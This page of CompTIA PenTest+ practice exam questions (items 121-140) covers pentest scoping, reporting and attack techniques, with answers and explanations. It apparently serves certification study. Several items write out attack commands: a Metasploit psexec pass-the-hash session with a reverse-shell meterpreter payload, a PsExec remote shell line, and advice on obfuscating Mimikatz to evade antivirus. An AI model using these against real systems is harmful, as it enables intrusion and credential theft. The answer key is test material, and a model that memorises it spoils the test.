CompTIA PenTest+ Exam Questions

Page 7 of 25

121.

Which of the following elements in a target list for a pentest is MOST important when considering the legal and regulatory compliance of data maintained by the client?

  • Physical location

  • IP ranges

  • SaaS providers

  • Domains

Correct answer: Physical location

The location of the test can influence the legal and regulatory requirements that the client has to adhere to. For example, if the site is in the European Union, then it must adhere to GDPR.

IP ranges and domains are not bound by geographic jurisdictions. SaaS may reside in various jurisdictions but typically have their own certifications of regulatory compliance and maintain the data.

122.

Which of the following commands can you set your wireless adapter to capture traffic?

  • airmon-ng start <wireless interface>

  • airbase-ng <wireless interface>

  • aircrack-ng start <wireless interface>

  • ifconfig <wireless interface>

Correct answer: airmon-ng start <wireless interface>

This command is by default in the Aircrack-ng package, and it automatically sets your net_device into monitor mode.

The airbase-ng tool is a tool for creating rogue access points. The aircrack-ng command is the final command to order the attack. The ifconfig command displays your network interfaces.

123.

A client wants to ensure the confidentiality of the organization's internal information during a penetration test. Which document should be signed for this?

  • NDA

  • SOW

  • RoE

  • MSA

Correct answer: NDA

A Non-Disclosure Agreement (NDA) is protecting the business's competitive advantages from being disclosed to third parties. In the event the organization is compromised, the vendor is obligated to maintain the secrecy of the privileged information it might obtain during the pentest.

An SOW is a statement of the work that will be performed. An RoE is a document that defines the boundaries, scope, and objectives of a penetration test. An MSA is used to define services that can apply to current and future contracts.

124.

Given the command excerpt below, what type of attack is being carried out?

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(psexec) > set LHOST 192.168.57.133

LHOST => 192.168.57.133

msf exploit(psexec) > set LPORT 443

LPORT => 443

msf exploit(psexec) > set RHOST 192.168.57.131

RHOST => 192.168.57.131

msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c

SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c

msf exploit(psexec) > exploit

  • Pass-the-hash attack

  • Remote code execution

  • User enumeration using SMB

  • On-path attack

Correct answer: Pass-the-hash attack

Pass-the-hash attacks rely on injecting hashes into LSASS or presenting NTLM hashes to services like SMB or WMI. This is made easier by the fact that the Sysinternals PsExec tool can directly accept an NTLM hash as an argument instead of a password.

125.

During the penetration test, a pentester was able to successfully exploit a SQL injection vulnerability on the client's website. When dumping the database, they noticed that all passwords were stored in clear text. They then used the credentials from the database and attempted to authenticate against other clients' assets. Eventually, they managed to gain shell access to one of the file share servers. 

What mitigation should they suggest to the client based on the above results?

  • Always store passwords in an encrypted state

  • Prevent external logging with a firewall

  • Train users to use more complex passwords

  • Change website technology to NoSQL

Correct answer: Always store passwords in an encrypted state

Regardless of the technology and the platform, passwords should always be stored in an encrypted state. There is always the danger of compromising the host when passwords are stored in plain text.

126.

Which of the following concerns is relevant when looking at REST security?

  • Ensuring that all communications between clients and the server are encrypted

  • Ensuring that all requests use Captcha during the authentication process

  • Ensuring that JWTs are not revoked after each session

  • Ensuring that rate limiting is not enacted on RESTful APIs

Correct answer: Ensuring that all communications between clients and the server are encrypted

Representational State Transfer (REST) is a modern standard for APIs. Encrypting all communications between clients and servers can be accomplished with HTTPS.

Relying on Captcha for authentication is insufficient and a hindrance for users. JSON Web Tokens (JWTs) should be revoked after each session. Rate limiting is a security measure to protect against DDoS attacks.

127.

An organization needs a penetration test. They want to be sure that the pentesters they hire have an ethical mindset. 

What can they request from the pentesting team to ensure this?

  • Background checks

  • NDA

  • Due diligence

  • Target list

Correct answer: Background checks

Background checks can be used to determine if a penstester has a criminal background and also to verify their credentials. Since pentesters will have access to sensitive information, it is important that they have an ethical mindset.

A non-disclosure agreement (NDA) is used to ensure that data is not shared with other parties. Due diligence is used to assess finances and operations of an organization. A target list is the assets that will be tested.

128.

A client has its own repository for virtual machines that it deploys. 

What type of threat does the repository pose that a pentester should be aware of?

  • Compromised instances

  • VM escape

  • W3AF attacks

  • IPMI attacks

Correct answer: Compromised instances

An attacker can insert fake or impersonated virtual machine instances into a repository. This can lead to the instances being exploited if they are used by a hypervisor.

VM escape relates to interactions between the virtual machine and its host. 

W3AF is a web application security scanner. 

IPMI attacks focus on devices that have remote management.

129.

A pentester is creating a script to scan ports of systems. They want the main part of the script to be a reusable chunk of code that takes the system to scan as input. 

What type of construct should they use for this section of code?

  • Function

  • Dictionary

  • Library

  • Boolean

Correct answer: Function

A function is a block of code that takes input, performs operations with it, and provides output. Functions, like procedures, are used to make code simpler and more concise.

A dictionary is a key-value data structure.

A library is a collection of pre-written resources for code. 

A Boolean is data that is either true or false.

130.

A penetration tester is looking through a report and notices that a vulnerability associated with the Microsoft Remote Desktop service was found on a Linux machine. 

How should they BEST categorize this finding?

  • False positive 

  • True positive

  • False negative 

  • True negative

Correct answer: False positive 

Non-credentialed vulnerability scans can produce a fair share of false positives and may provide little to no verification of discovered vulnerabilities. The Microsoft Remote Desktop service is not typically installed on a Linux machine by default, thus suggesting that the vulnerability is a false-positive and not exploitable.

A true positive is successfully identifying a vulnerability. A false negative is a vulnerability that is not discovered. A true negative is a weakness that is identified but wrongly considered not to be a vulnerability.

131.

What is one of the MAIN reasons for running Mimikatz from memory?

  • Evasion

  • Fast results

  • Multithreading

  • 32-bit and 64-bit support

Correct answer: Evasion

Running Mimikatz in memory rather than on disk has benefits, such as antivirus evasion. You can also use some trivial encoding or obfuscation techniques, like updating the Invoke-Mimikatz.ps1 command from the PowerSploit framework until it can no longer be detected by antivirus signatures.

132.

You have gained access to a Windows machine. By dumping the SAM database and cracking it, you have obtained a domain admin's credentials. 

How could you use these credentials for a lateral movement to another machine without making too much noise?

  • Use PsExec and execute commands remotely on another machine

  • Start looking for RDP services running in the network

  • Use Telnet to connect to other machines

  • Run an aggressive nmap scan on the network to find other vulnerable systems

Correct answer: Use PsExec and execute commands remotely on another machine

An example of a PsExec remote command:

.\PsExec.exe -u domainadmin -p adminpass \\remotehost cmd

This will open a cmd session on the remote host.

RDP is not as stealthy as PsExec. Telnet is a service associated with Unix-based systems. An aggressive network scan can alert administrators to a pentester's activity.

133.

You have completed the pentest engagement, but because some of the applications were still in the development stage, you were unable to properly test them. 

How could you BEST address this issue?

  • You could use the conclusion section to suggest future tests of previously excluded items

  • You could mention this issue in a face-to-face meeting with the client

  • You could prepare a new pentest offer and send it to the client with the pentest report

  • You could test the development environment as a gesture of goodwill

Correct answer: You could use the conclusion section to suggest future tests of previously excluded items

The conclusion section is where such information should be included. For example, if your penetration test scope excluded web application testing, you might recommend conducting that testing in a future engagement.

134.

Penetration testing includes a lot of technical work and generates a lot of log data. Scan results are sometimes several pages long. You want to include all this information in the report but are afraid that if you put it in the "findings" section, the report will be much too long, which is not ideal. 

Which solution will resolve this issue?

  • Reference the results in an appendix in the conclusion section

  • Do not include these results

  • Regardless of formatting and report size, all these results should be part of the findings section

  • Archive these results and provide them separately

Correct answer: Reference the results in an appendix in the conclusion section

It is good practice to keep the report clean and tidy with only relevant information in it. However, it is also good practice to provide all secondary information related to the test in an appendix for detailed technical review.

135.

You are tasked with performing a spear phishing attack. Which tool could help you quickly perform that task?

  • SET

  • Nessus

  • Ettercap

  • Nikto

Correct answer: SET

The Social-Engineer Toolkit (SET) is an open-source penetration testing framework designed for Social-Engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of the time. SET was developed by David Kennedy and simplifies a number of social engineering attacks such as phishing, spear phishing, malicious USBs, etc. Furthermore, it has been integrated with Metasploit so that pentesters can use Metasploit exploits and payloads in social engineering attacks.

Phishing and spear phishing are very common forms of email attacks designed to trick you into performing a specific action—typically clicking on a malicious link or attachment. The difference between them is primarily a matter of targeting. Phishing emails are sent to very large numbers of recipients, more or less at random, with the expectation that only a small percentage will respond. Spear phishing emails are carefully designed to get a single recipient to respond.

Nessus is used for vulnerability assessments. Ettercap is used for on-path attacks. Nikto is a web server scanner.

136.

Which is a common indicator of an account takeover of cloud services?

  • Unusual login locations or times

  • High CPU usage on VMs

  • Disabling of logging and monitoring

  • Increased traffic to web applications

Correct answer: Unusual login locations or times

Logins from unusual locations or at unusual times can be an indicator of an account takeover of cloud services. Accounts are often compromised through social engineering efforts.

High CPU usage can be an indicator of a compromised VM. Disabled logging or monitoring is an indicator of stronger malicious activity. Increased traffic to web servers can be an indicator of a DDoS.

137.

What remediation method could be suggested in the following scenario?

On one of a client's servers, the following services are found to be running: 

  • 22 SSH
  • 23 Telnet
  • 25 SMTP
  • 80 HTTP
  • 443 HTTPS

Upon checking with the client, you are informed that they haven't used telnet for years.

  • Close all unused ports and disable all unused services

  • Change the telnet port to one less frequently used

  • Institute a regular user password-changing policy

  • Use two-factor authentication for telnet login

Correct answer: Close all unused ports and disable all unused services

One of the best and, in fact, mandatory ways to improve the security state of a system, or even of an environment, is to make sure there are no running services or open ports that are not being used.

138.

In the middle of your testing window, you have managed to obtain what appears to be the username and NTLM password hash for the domain admin account. You tried cracking the password but were not successful. 

What other options do you have?

  • You can try a "pass-the-hash" attack with mimikatz

  • You can try a "pass-the-hash" attack using hashcat

  • If the password can't be cracked, there is nothing else to try

  • You can use the hash in a brute-force attack

Correct answer: You can try a "pass-the-hash" attack with mimikatz

Mimikatz is a very powerful tool that offers the functionality of using a hash for authentication. 

Hashcat does not offer "pass-the-hash" capability.

139.

You completed a scan of the client's server and discovered a running SMTP service on port 587. You tested the service for all known exploitations, and it failed. When you reported the open port, the client was surprised and informed you that this SMTP was no longer used. 

How should you handle the SMTP service in your report?

  • You should suggest the SMTP be stopped and the port be closed, as it is no longer needed

  • As long as the service is secure and not exploitable, there is no harm in keeping it running

  • Additional security layers should be added to this service if possible

  • This is not your concern because it was also new to the client

Correct answer: You should suggest the SMTP be stopped and the port be closed, as it is no longer needed

All unused services should be stopped, and all unused ports should be closed. Even though this service was not exploitable at the time, it could be exploited later.

140.

What will the following command achieve?

ssh -D 8181 www.example.com

  • It will create an SSH SOCKS proxy through www.example.com

  • It will attempt to connect to example.com over port 8181 via SSH

  • It will dump credentials from www.example.com over SSH on port 8181

  • It will scan www.example.com for SSH service on port 8181 

Correct answer: It will create an SSH SOCKS proxy through www.example.com

This command will allow you to configure your web browser to connect through the SOCKS (SOCKS4 or SOCKS5) proxy connection when browsing web pages and will allow you to execute port scans against internal hosts from outside the network using the SOCKS proxy.